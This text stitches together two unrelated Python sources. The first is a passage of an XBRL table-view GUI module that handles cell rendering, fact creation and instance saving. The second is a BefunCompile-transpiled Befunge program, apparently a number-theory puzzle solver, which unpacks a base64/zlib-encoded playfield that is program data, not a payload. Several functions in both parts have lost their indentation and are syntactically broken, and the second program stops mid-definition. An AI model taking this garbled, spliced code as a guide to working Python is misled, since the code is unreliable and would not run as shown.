                                yValue = row-1
                                self.table.initCellCombobox(effectiveValue,
                                                            enumerationValues,
                                                            xValue,
                                                            yValue,
                                                            objectId=objectId,
                                                            selectindex=selectedIdx,
                                                            codes=enumerationDict)
                            elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliQNameItemType:
                                # Eurofiling-annotated qname items get a combobox of domain members
                                if eurofilingModelPrefix in concept.nsmap and concept.nsmap.get(eurofilingModelPrefix) == eurofilingModelNamespace:
                                    hierarchy = concept.get("{" + eurofilingModelNamespace + "}" + "hierarchy", None)
                                    domainQNameAsString = concept.get("{" + eurofilingModelNamespace + "}" + "domain", None)
                                    if hierarchy is not None and domainQNameAsString is not None:
                                        newAspectValues = [""]
                                        newAspectQNames = dict()
                                        newAspectQNames[""] = None
                                        domPrefix, _, domLocalName = domainQNameAsString.strip().rpartition(":")
                                        domNamespace = concept.nsmap.get(domPrefix)
                                        relationships = concept_relationships(self.rendrCntx,
                                                                              None,
                                                                              (QName(domPrefix, domNamespace, domLocalName),
                                                                               hierarchy, # linkrole,
                                                                               "XBRL-dimensions",
                                                                               'descendant'),
                                                                              False) # return flat list
                                        for rel in relationships:
                                            if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
                                                and rel.isUsable):
                                                header = rel.toModelObject.label(lang=self.lang)
                                                newAspectValues.append(header)
                                                currentQName = rel.toModelObject.qname
                                                if str(currentQName) == value:
                                                    value = header
                                                newAspectQNames[header] = currentQName
                                    else:
                                        newAspectValues = None
                                else:
                                    newAspectValues = None
                                if newAspectValues is None:
                                    xValue = self.dataFirstCol + i-1
                                    yValue = row-1
                                    self.table.initCellValue(value,
                                                             xValue,
                                                             yValue,
                                                             justification=justify,
                                                             objectId=objectId,
                                                             backgroundColourTag=self.getbackgroundColor(fp))
                                else:
                                    qNameValues = newAspectValues
                                    try:
                                        selectedIdx = qNameValues.index(value)
                                        effectiveValue = value
                                    except ValueError:
                                        effectiveValue = qNameValues[0]
                                        selectedIdx = 0
                                    xValue = self.dataFirstCol + i-1
                                    yValue = row-1
                                    self.table.initCellCombobox(effectiveValue,
                                                                qNameValues,
                                                                xValue,
                                                                yValue,
                                                                objectId=objectId,
                                                                selectindex=selectedIdx,
                                                                codes=newAspectQNames)
                            elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliBooleanItemType:
                                booleanValues = ["",
                                                 XbrlConst.booleanValueTrue,
                                                 XbrlConst.booleanValueFalse]
                                try:
                                    selectedIdx = booleanValues.index(value)
                                    effectiveValue = value
                                except ValueError:
                                    effectiveValue = booleanValues[0]
                                    selectedIdx = 0
                                xValue = self.dataFirstCol + i-1
                                yValue = row-1
                                self.table.initCellCombobox(effectiveValue,
                                                            booleanValues,
                                                            xValue,
                                                            yValue,
                                                            objectId=objectId,
                                                            selectindex=selectedIdx)
                            else:
                                xValue = self.dataFirstCol + i-1
                                yValue = row-1
                                self.table.initCellValue(value,
                                                         xValue,
                                                         yValue,
                                                         justification=justify,
                                                         objectId=objectId,
                                                         backgroundColourTag=self.getbackgroundColor(fp))
                        else:
                            fp.clear() # dereference
                    row += 1
                if not yChildrenFirst:
                    # top-down layout: render descendant rows after this node's own row
                    row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
        return row
def onClick(self, event):
try:
objId = event.widget.objectId
if objId and objId[0] == "f":
viewableObject = self.factPrototypes[int(objId[1:])]
else:
viewableObject = objId
self.modelXbrl.viewModelObject(viewableObject)
except AttributeError: # not clickable
pass
self.modelXbrl.modelManager.cntlr.currentView = self
    def cellEnter(self, *args):
        # triggered on grid frame enter (not cell enter)
        # re-enable selection events and make this table the controller's current view
        self.blockSelectEvent = 0
        self.modelXbrl.modelManager.cntlr.currentView = self
    def cellLeave(self, *args):
        # triggered on grid frame leave (not cell leave)
        # suppress selection events while the pointer is outside the grid
        self.blockSelectEvent = 1
    # this method is not currently used
    def cellSelect(self, *args):
        # guarded no-op: the actual selection handling is commented out below,
        # only the re-entrancy counter is exercised
        if self.blockSelectEvent == 0 and self.blockViewModelObject == 0:
            self.blockViewModelObject += 1
            #self.modelXbrl.viewModelObject(self.nodeToObjectId[self.treeView.selection()[0]])
            #self.modelXbrl.viewModelObject(self.treeView.selection()[0])
            self.blockViewModelObject -= 1
    def viewModelObject(self, modelObject):
        # Synchronise this table view with a model object selected elsewhere:
        # when the object maps to a table ELR, switch to that table and focus
        # the "Table" tab. Re-entrancy is guarded via blockViewModelObject.
        if self.blockViewModelObject == 0:
            self.blockViewModelObject += 1
            try:
                if isinstance(modelObject, ModelDtsObject.ModelRelationship):
                    objectId = modelObject.toModelObject.objectId()
                else:
                    objectId = modelObject.objectId()
                if objectId in self.tablesToELR:
                    self.view(viewTblELR=self.tablesToELR[objectId])
                    try:
                        self.modelXbrl.modelManager.cntlr.currentView = self.modelXbrl.guiViews.tableView
                        # force focus (synch) on the corresponding "Table" tab (useful in case of several instances)
                        self.modelXbrl.guiViews.tableView.tabWin.select(str(self.modelXbrl.guiViews.tableView.viewFrame))
                    except:
                        # best-effort GUI focus only; never let it break selection
                        pass
            except (KeyError, AttributeError):
                pass
            self.blockViewModelObject -= 1
    def onConfigure(self, event, *args):
        # Handle frame <Configure> (resize) events: persist pending cell edits,
        # recompute geometry, and debounce a full view reload so a burst of
        # resize events triggers only one reload after 1.5s of quiet.
        if not self.blockMenuEvents:
            lastFrameWidth = getattr(self, "lastFrameWidth", 0)
            lastFrameHeight = getattr(self, "lastFrameHeight", 0)
            frameWidth = self.tabWin.winfo_width()
            frameHeight = self.tabWin.winfo_height()
            if lastFrameWidth != frameWidth or lastFrameHeight != frameHeight:
                self.updateInstanceFromFactPrototypes()
                self.lastFrameWidth = frameWidth
                self.lastFrameHeight = frameHeight
                self.setHeightAndWidth()
                if lastFrameWidth:
                    # frame resized, recompute row header column widths and lay out table columns
                    """
                    def sleepAndReload():
                        time.sleep(.75)
                        self.viewReloadDueToMenuAction()
                    self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((sleepAndReload, []))
                    """
                    #self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((self.viewReloadDueToMenuAction, []))
                    def deferredReload():
                        self.deferredReloadCount -= 1 # only do reload after all queued reload timers expire
                        if self.deferredReloadCount <= 0:
                            self.viewReloadDueToMenuAction()
                    self.deferredReloadCount = getattr(self, "deferredReloadCount", 0) + 1
                    self.viewFrame.after(1500, deferredReload)
    def onQuitView(self, event, *args):
        # this method is passed as callback when creating the view
        # (to ScrolledTkTableFrame and then to XbrlTable that will monitor cell operations)
        # flush pending cell edits into the instance, then refresh the properties pane
        self.updateInstanceFromFactPrototypes()
        self.updateProperties()
    def hasChangesToSave(self):
        # Truthy (the count of modified cells) when unsaved cell edits exist.
        return len(self.table.modifiedCells)
    def updateProperties(self):
        # Show the properties of the object behind the last-operated cell
        # (a fact or a fact prototype) when the document is an instance.
        if self.modelXbrl is not None:
            modelXbrl = self.modelXbrl
            # make sure we handle an instance
            if modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
                tbl = self.table
                # get coordinates of last currently operated cell
                coordinates = tbl.getCurrentCellCoordinates()
                if coordinates is not None:
                    # get object identifier from its coordinates in the current table
                    objId = tbl.getObjectId(coordinates)
                    if objId is not None and len(objId) > 0:
                        if objId and objId[0] == "f":
                            # fact prototype
                            viewableObject = self.factPrototypes[int(objId[1:])]
                        elif objId[0] != "a":
                            # instance fact
                            viewableObject = self.modelXbrl.modelObject(objId)
                        else:
                            # "a"-prefixed ids are open aspect entry widgets: nothing to show
                            return
                        modelXbrl.viewModelObject(viewableObject)
    def updateInstanceFromFactPrototypes(self):
        # Flush user edits held by the table widget back into the XBRL
        # instance: materialise fact prototypes as real facts (creating
        # contexts/units as needed) and update existing facts in place.
        # Only update the model if it already exists
        if self.modelXbrl is not None \
           and self.modelXbrl.modelDocument.type == ModelDocument.Type.INSTANCE:
            instance = self.modelXbrl
            cntlr = instance.modelManager.cntlr
            newCntx = ModelXbrl.AUTO_LOCATE_ELEMENT
            newUnit = ModelXbrl.AUTO_LOCATE_ELEMENT
            tbl = self.table
            # check user keyed changes to aspects
            aspectEntryChanges = {} # index = widget ID, value = widget contents
            aspectEntryChangeIds = _DICT_SET(aspectEntryChanges.keys())
            for modifiedCell in tbl.getCoordinatesOfModifiedCells():
                objId = tbl.getObjectId(modifiedCell)
                if objId is not None and len(objId)>0:
                    if tbl.isHeaderCell(modifiedCell):
                        if objId[0] == OPEN_ASPECT_ENTRY_SURROGATE:
                            aspectEntryChanges[objId] = tbl.getTableValue(modifiedCell)
                    else:
                        # check user keyed changes to facts
                        cellIndex = str(modifiedCell)
                        # a combobox in the cell shows labels; map the shown label back to its code
                        comboboxCells = tbl.window_names(cellIndex)
                        if comboboxCells is not None and len(comboboxCells)>0:
                            comboName = tbl.window_cget(cellIndex, '-window')
                            combobox = cntlr.parent.nametowidget(comboName)
                        else:
                            combobox = None
                        if isinstance(combobox, _Combobox):
                            codeDict = combobox.codes
                            if len(codeDict)>0: # the drop-down list shows labels, we want to have the actual values
                                bodyCellValue = tbl.getTableValue(modifiedCell)
                                value = codeDict.get(bodyCellValue, None)
                                if value is None:
                                    value = bodyCellValue # this must be a qname!
                            else:
                                value = tbl.getTableValue(modifiedCell)
                        else:
                            value = tbl.getTableValue(modifiedCell)
                        objId = tbl.getObjectId(modifiedCell)
                        if objId is not None and len(objId)>0:
                            if objId[0] == "f":
                                # "f"-prefixed: a fact prototype to be turned into a new fact
                                factPrototypeIndex = int(objId[1:])
                                factPrototype = self.factPrototypes[factPrototypeIndex]
                                concept = factPrototype.concept
                                if concept is None:
                                    if not self.conceptMessageIssued:
                                        # This should be removed once cells have been disabled until every needed selection is done
                                        self.conceptMessageIssued = True
                                        self.modelXbrl.modelManager.cntlr.showMessage(_("Please make sure every Z axis selection is done"))
                                    return
                                else:
                                    self.conceptMessageIssued = False
                                entityIdentScheme = self.newFactItemOptions.entityIdentScheme
                                entityIdentValue = self.newFactItemOptions.entityIdentValue
                                periodType = concept.periodType
                                periodStart = self.newFactItemOptions.startDateDate if periodType == "duration" else None
                                periodEndInstant = self.newFactItemOptions.endDateDate
                                qnameDims = factPrototype.context.qnameDims
                                newAspectValues = self.newFactOpenAspects(objId)
                                if newAspectValues is None:
                                    self.modelXbrl.modelManager.showStatus(_("Some open values are missing in an axis, the save is incomplete"), 5000)
                                    continue
                                qnameDims.update(newAspectValues)
                                # open aspects widgets
                                # reuse an existing matching context or create a new one
                                prevCntx = instance.matchContext(
                                    entityIdentScheme, entityIdentValue, periodType, periodStart, periodEndInstant,
                                    qnameDims, [], [])
                                if prevCntx is not None:
                                    cntxId = prevCntx.id
                                else: # need new context
                                    newCntx = instance.createContext(entityIdentScheme, entityIdentValue,
                                                                     periodType, periodStart, periodEndInstant,
                                                                     concept.qname, qnameDims, [], [],
                                                                     afterSibling=newCntx)
                                    cntxId = newCntx.id # need new context
                                # new context
                                # pick unit and decimals according to the concept's numeric type
                                if concept.isNumeric:
                                    if concept.isMonetary:
                                        unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
                                        unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
                                        decimals = self.newFactItemOptions.monetaryDecimals
                                    elif concept.isShares:
                                        unitMeasure = XbrlConst.qnXbrliShares
                                        decimals = self.newFactItemOptions.nonMonetaryDecimals
                                    else:
                                        unitMeasure = XbrlConst.qnXbrliPure
                                        decimals = self.newFactItemOptions.nonMonetaryDecimals
                                    prevUnit = instance.matchUnit([unitMeasure], [])
                                    if prevUnit is not None:
                                        unitId = prevUnit.id
                                    else:
                                        newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
                                        unitId = newUnit.id
                                attrs = [("contextRef", cntxId)]
                                if concept.isNumeric:
                                    attrs.append(("unitRef", unitId))
                                    attrs.append(("decimals", decimals))
                                    value = Locale.atof(self.modelXbrl.locale, value, str.strip)
                                newFact = instance.createFact(concept.qname, attributes=attrs, text=value)
                                tbl.setObjectId(modifiedCell,
                                                newFact.objectId()) # switch cell to now use fact ID
                                if self.factPrototypes[factPrototypeIndex] is not None:
                                    self.factPrototypes[factPrototypeIndex].clear()
                                self.factPrototypes[factPrototypeIndex] = None #dereference fact prototype
                            elif objId[0] != "a": # instance fact, not prototype
                                fact = self.modelXbrl.modelObject(objId)
                                if fact.concept.isNumeric:
                                    value = Locale.atof(self.modelXbrl.locale, value, str.strip)
                                    if fact.concept.isMonetary:
                                        unitMeasure = qname(XbrlConst.iso4217, self.newFactItemOptions.monetaryUnit)
                                        unitMeasure.prefix = "iso4217" # want to save with a recommended prefix
                                        decimals = self.newFactItemOptions.monetaryDecimals
                                    elif fact.concept.isShares:
                                        unitMeasure = XbrlConst.qnXbrliShares
                                        decimals = self.newFactItemOptions.nonMonetaryDecimals
                                    else:
                                        unitMeasure = XbrlConst.qnXbrliPure
                                        decimals = self.newFactItemOptions.nonMonetaryDecimals
                                if fact.value != str(value):
                                    # empty value toggles the fact's nil state
                                    if fact.isNil != (not value):
                                        fact.isNil = not value
                                        if fact.isNil:
                                            pass
                                            #TODO: clear out nil facts
                                    if fact.concept.isNumeric and (not fact.isNil): # if nil, there is no need to update these values
                                        fact.decimals = decimals
                                        prevUnit = instance.matchUnit([unitMeasure], [])
                                        if prevUnit is not None:
                                            unitId = prevUnit.id
                                        else:
                                            newUnit = instance.createUnit([unitMeasure], [], afterSibling=newUnit)
                                            unitId = newUnit.id
                                        fact.unitID = unitId
                                    fact.text = str(value)
                                    instance.setIsModified()
                                    fact.xValid = UNVALIDATED
                                    xmlValidate(instance, fact)
            tbl.clearModificationStatus()
    def saveInstance(self, newFilename=None, onSaved=None):
        # Save the instance document: prompt for new-fact item options (and a
        # filename when the model is not yet an instance), then perform the
        # actual save on a background thread to keep the UI responsive.
        if (not self.newFactItemOptions.entityIdentScheme or # not initialized yet
            not self.newFactItemOptions.entityIdentValue or
            not self.newFactItemOptions.startDateDate or not self.newFactItemOptions.endDateDate):
            if not getNewFactItemOptions(self.modelXbrl.modelManager.cntlr, self.newFactItemOptions):
                return # new instance not set
        # newFilename = None # only used when a new instance must be created
        self.updateInstanceFromFactPrototypes()
        if self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE and newFilename is None:
            newFilename = self.modelXbrl.modelManager.cntlr.fileSave(view=self, fileType="xbrl")
            if not newFilename:
                return # saving cancelled
        # continue saving in background
        thread = threading.Thread(target=lambda: self.backgroundSaveInstance(newFilename, onSaved))
        thread.daemon = True
        thread.start()
    def backgroundSaveInstance(self, newFilename=None, onSaved=None):
        # Worker run on a background thread by saveInstance(): creates a new
        # instance document when needed, flushes pending edits, writes the
        # file, and reports progress via the controller status bar.
        cntlr = self.modelXbrl.modelManager.cntlr
        if newFilename and self.modelXbrl.modelDocument.type != ModelDocument.Type.INSTANCE:
            self.modelXbrl.modelManager.showStatus(_("creating new instance {0}").format(os.path.basename(newFilename)))
            self.modelXbrl.modelManager.cntlr.waitForUiThreadQueue() # force status update
            self.modelXbrl.createInstance(newFilename) # creates an instance as this modelXbrl's entrypoint
        instance = self.modelXbrl
        cntlr.showStatus(_("Saving {0}").format(instance.modelDocument.basename))
        cntlr.waitForUiThreadQueue() # force status update
        self.updateInstanceFromFactPrototypes()
        instance.saveInstance(newFilename) # may override prior filename for instance from main menu
        cntlr.addToLog(_("{0} saved").format(newFilename if newFilename is not None else instance.modelDocument.filepath))
        cntlr.showStatus(_("Saved {0}").format(instance.modelDocument.basename), clearAfter=3000)
        if onSaved is not None:
            # run the completion callback on the UI thread
            self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((onSaved, []))
    def newFactOpenAspects(self, factObjectId):
        # Collect the aspect values keyed in by the user in the open-axis
        # entry widgets attached to this fact prototype. Returns a dict of
        # aspect -> value, or None when a required open value is still empty.
        aspectValues = {}
        for aspectObjId in self.factPrototypeAspectEntryObjectIds[factObjectId]:
            structuralNode = self.aspectEntryObjectIdsNode[aspectObjId]
            # pick the first covered aspect other than DIMENSIONS
            # ("aspect" intentionally stays bound after the loop)
            for aspect in structuralNode.aspectsCovered():
                if aspect != Aspect.DIMENSIONS:
                    break
            gridCellItem = self.aspectEntryObjectIdsCell[aspectObjId]
            value = gridCellItem.get()
            # is aspect in a childStructuralNode?
            if value is not None and OPEN_ASPECT_ENTRY_SURROGATE in aspectObjId and len(value)==0:
                return None # some values are missing!
            if value:
                aspectValue = structuralNode.aspectEntryHeaderValues.get(value)
                if aspectValue is None: # try converting value
                    if isinstance(aspect, QName): # dimension
                        dimConcept = self.modelXbrl.qnameConcepts[aspect]
                        if dimConcept.isExplicitDimension:
                            # value must be qname
                            aspectValue = None # need to find member for the description
                        else:
                            # typed dimension: wrap the keyed text in the typed domain element
                            typedDimElement = dimConcept.typedDomainElement
                            aspectValue = FunctionXfi.create_element(
                                self.rendrCntx, None, (typedDimElement.qname, (), value))
                if aspectValue is not None:
                    aspectValues[aspect] = aspectValue
        return aspectValues
    def aspectEntryValues(self, structuralNode):
        # Return the sorted header values selectable for an open aspect entry
        # node, caching header -> aspect value on the node for later lookup.
        # pick the first covered aspect other than DIMENSIONS
        # ("aspect" intentionally stays bound after the loop)
        for aspect in structuralNode.aspectsCovered():
            if aspect != Aspect.DIMENSIONS:
                break
        # if findHeader is None, return all header values in a list
        # otherwise return aspect value matching header if any
        depth = 0
        n = structuralNode
        while (n.parentStructuralNode is not None):
            depth += 1
            root = n = n.parentStructuralNode
        headers = set()
        headerValues = {}
        def getHeaders(n, d):
            # recursively collect headers of sibling nodes at structuralNode's depth
            for childStructuralNode in n.childStructuralNodes:
                if d == depth:
                    h = childStructuralNode.header(lang=self.lang,
                                                   returnGenLabel=False,
                                                   returnMsgFormatString=False)
                    if not childStructuralNode.isEntryPrototype() and h:
                        headerValues[h] = childStructuralNode.aspectValue(aspect)
                        headers.add(h)
                else:
                    getHeaders(childStructuralNode, d+1)
        getHeaders(root, 1)
        structuralNode.aspectEntryHeaderValues = headerValues
        # is this an explicit dimension, if so add "(all members)" option at end
        headersList = sorted(headers)
        if isinstance(aspect, QName): # dimension
            dimConcept = self.modelXbrl.qnameConcepts[aspect]
            if dimConcept.isExplicitDimension:
                if headersList: # has entries, add all-members at end
                    headersList.append("(all members)")
                else: # empty list, just add all members anyway
                    return self.explicitDimensionFilterMembers(structuralNode, structuralNode)
        return headersList
def onAspectComboboxSelection(self, event):
gridCombobox = event.widget
if gridCombobox.get() == "(all members)":
structuralNode = self.aspectEntryObjectIdsNode[gridCombobox.objectId]
self.comboboxLoadExplicitDimension(gridCombobox, structuralNode, structuralNode)
    def comboboxLoadExplicitDimension(self, gridCombobox, structuralNode, structuralNodeWithFilter):
        # Fill the combobox drop-down with all dimension members selected by
        # structuralNodeWithFilter's filters.
        gridCombobox["values"] = self.explicitDimensionFilterMembers(structuralNode, structuralNodeWithFilter)
    def explicitDimensionFilterMembers(self, structuralNode, structuralNodeWithFilter):
        # Return the sorted labels of explicit-dimension members usable under
        # structuralNodeWithFilter's dimension filters, falling back to the
        # whole dimension tree when the filters yield nothing; caches
        # label -> qname on structuralNode for later resolution.
        # pick the first dimension (QName) aspect covered
        # ("aspect" intentionally stays bound after the loop)
        for aspect in structuralNodeWithFilter.aspectsCovered():
            if isinstance(aspect, QName): # dimension
                break
        valueHeaders = set()
        if structuralNode is not None:
            headerValues = {}
            # check for dimension filter(s)
            dimFilterRels = structuralNodeWithFilter.definitionNode.filterRelationships
            if dimFilterRels:
                for rel in dimFilterRels:
                    dimFilter = rel.toModelObject
                    if dimFilter is not None:
                        for memberModel in dimFilter.memberProgs:
                            memQname = memberModel.qname
                            memConcept = self.modelXbrl.qnameConcepts.get(memQname)
                            if memConcept is not None and (not memberModel.axis or memberModel.axis.endswith('-self')):
                                header = memConcept.label(lang=self.lang)
                                valueHeaders.add(header)
                                if rel.isUsable:
                                    headerValues[header] = memQname
                                else:
                                    headerValues[header] = memConcept
                            if memberModel.axis and memberModel.linkrole and memberModel.arcrole:
                                # merge of pull request 42 acsone:TABLE_Z_AXIS_DESCENDANT_OR_SELF
                                if memberModel.axis.endswith('-or-self'):
                                    searchAxis = memberModel.axis[:len(memberModel.axis)-len('-or-self')]
                                else:
                                    searchAxis = memberModel.axis
                                relationships = concept_relationships(self.rendrCntx,
                                                                      None,
                                                                      (memQname,
                                                                       memberModel.linkrole,
                                                                       memberModel.arcrole,
                                                                       searchAxis),
                                                                      False) # return flat list
                                for rel in relationships:
                                    if rel.isUsable:
                                        header = rel.toModelObject.label(lang=self.lang)
                                        valueHeaders.add(header)
                                        headerValues[header] = rel.toModelObject.qname
            if not valueHeaders:
                # no filtered members: fall back to every descendant of the dimension
                relationships = concept_relationships(self.rendrCntx,
                                                      None,
                                                      (aspect,
                                                       "XBRL-all-linkroles", # linkrole,
                                                       "XBRL-dimensions",
                                                       'descendant'),
                                                      False) # return flat list
                for rel in relationships:
                    if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
                        and rel.isUsable):
                        header = rel.toModelObject.label(lang=self.lang)
                        valueHeaders.add(header)
                        headerValues[header] = rel.toModelObject.qname
            structuralNode.aspectEntryHeaderValues = headerValues
        return sorted(valueHeaders)
# import after other modules resolved to prevent circular references
from arelle.FunctionXfi import concept_relationships
| |
#!/usr/bin/env python2
# transpiled with BefunCompile v1.3.0 (c) 2017
import sys
import zlib, base64
_g = ("AR+LCAAAAAAABADdVMGO4yAM/RW3yV5AbDGQNkEIjfYDttfOKEr3xpUTp+6/r03SadrRaKRqTmspNQXbvPfspLy+vgJb82DwpJ1+nU7fWe/t7e1b8f1+NvETOx6P1X8X"
+ "vqv9R/UKDN5nJ4cxdZKXyEtDSwjP1Ityn8ZBdtmjGjdFw6rMM/VmjIu1Z+8HiXyBzn76Iq0mnkujxPbvts9oPaWibR8AzbfzZty+wNYLL4TBbC1mjTb3Pcjoe6nHvuKI"
+ "iOnnS2XazyQvtFbGpJ0x2XZiWl+/WNbGUzVN14c2nKdm4xXmeyDTorsPDUzCJ8Ngs0FFK5HAmFCoRNKWKSWNnj2EtQqh0F4trUcte2rmqClCdDZjpX6+3QaQorcko9GQ"
+ "xp00Ow9Wp1W5eKNO7WTn2NWIWCP+LNGxbaEt5j3x6lsq6B1mLywmxTq1uHcCM/86YmMykmikk+Yj6QfVq5pKomo7rWSj9tXu3bG93tOAbaBrQNReNnQwkcZepV6+iwqh"
+ "LSyEsbtkjKzyuvtJuPajha+NOE7R8zhqHkdM1iQh0SbpCzW+s6vmXjajQp+cuY5e5LwD5w1JLTH8cFgmuOOPhAayxR37QCMaZ0waHY0YiMj3jlAuGzUkZ6nhB3Kcld2c"
+ "5GUKpH8nKkZX38kbxrIiGUU0wGVFBWZckg3slXV5kCbRX3YlYjnEz2pBeKA4MzlcNXh8UxvWWqU5ar/wXej6EJeYyrFcgDjCTHK4J0kceScUFOEyBkcjhAuRtU0ris0Q"
+ "gTgCkVwo7meK+0QjKgTSwRTpGKT97PtS92m+KvoAU/fhk/Ixo0b8A6X0qdzQBwAA")
g = base64.b64decode(_g)[1:]
for i in range(ord(base64.b64decode(_g)[0])):
g = zlib.decompress(g, 16+zlib.MAX_WBITS)
g=list(map(ord, g))
def gr(x,y):
    # Playfield read: cells outside the 80x25 grid read as 0.
    if 0 <= x < 80 and 0 <= y < 25:
        return g[y*80 + x]
    return 0
def gw(x,y,v):
    # Playfield write: writes outside the 80x25 grid are silently ignored.
    if 0 <= x < 80 and 0 <= y < 25:
        g[y*80 + x] = v
def td(a,b):
    # Befunge integer division: dividing by zero yields 0, otherwise floor division.
    return 0 if b == 0 else a // b
def tm(a,b):
    # Befunge modulo: modulo by zero yields 0, otherwise Python's floored modulo.
    return 0 if b == 0 else a % b
s=[]
def sp():
    # Pop the Befunge data stack; popping an empty stack yields 0.
    global s
    return s.pop() if s else 0
def sa(v):
    # Push v onto the Befunge data stack.
    global s
    s.append(v)
def sr():
    # Peek at the Befunge data stack top; an empty stack reads as 0.
    global s
    return s[-1] if s else 0
def _0():
gw(2,1,67108864)
gw(3,1,3)
gw(1,3,0)
gw(24,8,0)
sa(15)
sa(15)
return 1
def _1():
return (55)if(sp()!=0)else(2)
def _2():
sp();
return 3
def _3():
global t0
t0=gr(3,1)
sa(gr(3,1))
sa(gr(3,1))
gw(1,0,0)
gw(2,0,t0)
return 4
def _4():
global t0
global t1
gw(3,0,sp())
t0=gr(2,0)
sa(sr());
sa(t0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
v0=sp()
sa(td(sp(),v0))
t1=sp()
sa(sp()+t1)
sa(sp()/2);
return (53)if((sr()-gr(3,0))!=0)else(5)
def _5():
global t0
t0=gr(3,0)*gr(3,0)
gw(4,1,gr(3,0))
t0=t0-gr(3,1)
sp();
return (6)if((t0)!=0)else(52)
def _6():
gw(24,5,0)
gw(24,4,0)
gw(24,1,0)
gw(24,0,0)
sa(15)
sa(15)
return 7
def _7():
return (51)if(sp()!=0)else(8)
def _8():
gw(24,1,1)
gw(24,4,1)
gw(1,2,0)
gw(2,2,1)
sp();
return 9
def _9():
gw(3,2,td(gr(4,1)+gr(1,2),gr(2,2)))
sa(15)
sa(15)
sa(gr(24,0)+(gr(24,1)*gr(3,2))+gr(1,3))
gw(1,3,td(gr(24,0)+(gr(24,1)*gr(3,2))+gr(1,3),gr(2,1)))
return 10
def _10():
sa(tm(sp(),gr(2,1)))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(2)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (50)if(sp()!=0)else(11)
def _11():
sp();
sa(15)
sa(15)
sa(gr(24,4)+(gr(24,5)*gr(3,2))+gr(1,3))
gw(1,3,td(gr(24,4)+(gr(24,5)*gr(3,2))+gr(1,3),gr(2,1)))
return 12
def _12():
sa(tm(sp(),gr(2,1)))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(6)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (13)if(sp()!=0)else(14)
def _13():
global t0
global t1
sa(sr());
sa(sr());
t0=gr(sr()+9,4)
sa(sp()+9)
sa(5)
v0=sp()
t1=gr(sp(),v0)
t1=t1*gr(3,2)
sa(t0+t1+gr(1,3))
gw(1,3,td(sr(),gr(2,1)))
return 12
def _14():
gw(1,4,1)
gw(24,9,0)
sp();
sa(14)
sa(15)
return 15
def _15():
return (49)if(sp()!=0)else(16)
def _16():
gw(2,4,15)
sp();
return 17
def _17():
gw(3,4,gr(2,4)+9)
sa(15)
sa((gr(24,6)*gr(gr(2,4)+9,6)*gr(3,1))+gr(1,4)+gr(gr(3,4),9))
gw(1,4,td((gr(24,6)*gr(gr(2,4)+9,6)*gr(3,1))+gr(1,4)+gr(gr(3,4),9),gr(2,1)))
return 18
def _18():
sa(tm(sp(),gr(2,1)))
gw(gr(3,4),9,sp())
sa(sp()-1)
return (48)if(gr(3,4)!=9)else(19)
def _19():
global t0
t0=gr(2,4)-1
sp();
return (47)if((gr(2,4))!=0)else(20)
def _20():
gw(1,4,0)
gw(24,7,0)
sa(14)
sa(15)
return 21
def _21():
return (46)if(sp()!=0)else(22)
def _22():
gw(2,4,15)
sp();
return 23
def _23():
gw(3,4,gr(2,4)+9)
sa(15)
sa((gr(24,2)*gr(gr(2,4)+9,2))+gr(1,4)+gr(gr(3,4),7))
gw(1,4,td((gr(24,2)*gr(gr(2,4)+9,2))+gr(1,4)+gr(gr(3,4),7),gr(2,1)))
return 24
def _24():
sa(tm(sp(),gr(2,1)))
gw(gr(3,4),7,sp())
sa(sp()-1)
return (45)if(gr(3,4)!=9)else(25)
def _25():
global t0
t0=gr(2,4)-1
sp();
return (44)if((gr(2,4))!=0)else(26)
def _26():
sa(15)
sa(gr(24,7)-gr(24,9))
return 27
def _27():
return (40)if(sp()!=0)else(28)
def _28():
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (29)if(sp()!=0)else(30)
def _29():
global t0
global t1
sa(sr());
t0=gr(sr()+9,7)
sa(sp()+9)
sa(9)
v0=sp()
t1=gr(sp(),v0)
sa(t0-t1)
return 27
def _30():
global t0
global t1
t0=1
t1=1
sp();
sa(0)
sa(gr(9,2)-gr(9,8))
sa(gr(9,2)-gr(9,8))
return 31
def _31():
return (36)if(sp()!=0)else(32)
def _32():
sp();
sa(sp()+1)
return (35)if(sr()!=17)else(33)
def _33():
global t0
t0=gr(3,1)-999
gw(3,1,gr(3,1)+1)
sp();
return (3)if((t0)!=0)else(34)
def _34():
sys.stdout.write(str(gr(1,1))+" ")
sys.stdout.flush()
return 56
def _35():
global t0
global t1
sa(sr());
t0=gr(sr()+9,2)
sa(sp()+9)
sa(8)
v0=sp()
t1=gr(sp(),v0)
sa(t0-t1)
sa(t0-t1)
return 31
def _36():
sa((1)if(sp()>0)else(0))
return (37)if(sp()!=0)else(33)
def _37():
gw(1,1,gr(3,1))
gw(24,8,gr(24,2))
sp();
sa(14)
sa(15)
return 38
def _38():
return (39)if(sp()!=0)else(33)
def _39():
sa(sr());
sa(gr(sr()+9,2))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(8)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 38
def _40():
gw(1,2,(gr(3,2)*gr(2,2))-gr(1,2))
gw(2,2,td(gr(3,1)-(gr(1,2)*gr(1,2)),gr(2,2)))
sp();
sa(15)
sa(0)
return 41
def _41():
